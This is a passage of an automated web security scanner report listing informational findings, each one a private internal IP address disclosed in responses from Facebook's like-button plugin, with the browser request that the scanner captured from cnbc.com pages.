Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.786. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.83.113

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2299b5cf4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff99472368%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.787. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.220.44

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df17afe95ac%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff41dc3238%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.788. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.180.45

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df8e8e994%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2519325b4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.789. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.147.112

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df6daddc2c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff30c81b7ac%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.790. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.116.52

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2e061a5a%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff36caf868c%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.791. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.55.10.52

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df16aca2c6c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3306de7a4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.792. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.213.48

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1a6f47958%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff321cafa4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.793. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.38.47

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df35ef54634%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff589430f%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.794. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.99.33

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2ebf3bf14%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2a9bfff6%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.795. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.55.26.46

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfb4cb576c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff25c0fb1fc%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.796. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.191.33

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df27ca24ecc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3a6b1c944%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43418837&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43418837
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.797. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.157.48

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df283f04cd%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffa0ab181%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.798. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.63.22.48

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df234c72d44%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff326be5c14%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.799. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.43.127.37

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df32adf5cdc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff7024fb3%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.800. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.68.40

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfd8d377b%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff96bb174%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.801. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.245.46

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2fc8772c8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff14a87b2b8%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.802. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.146.62

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1e6496c58%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffac3ba548%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.803. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.54.50

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df18d98a088%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2a28c999%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.804. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.77.40

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2bb31b33c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffef219d14%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.805. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.193.51

Request

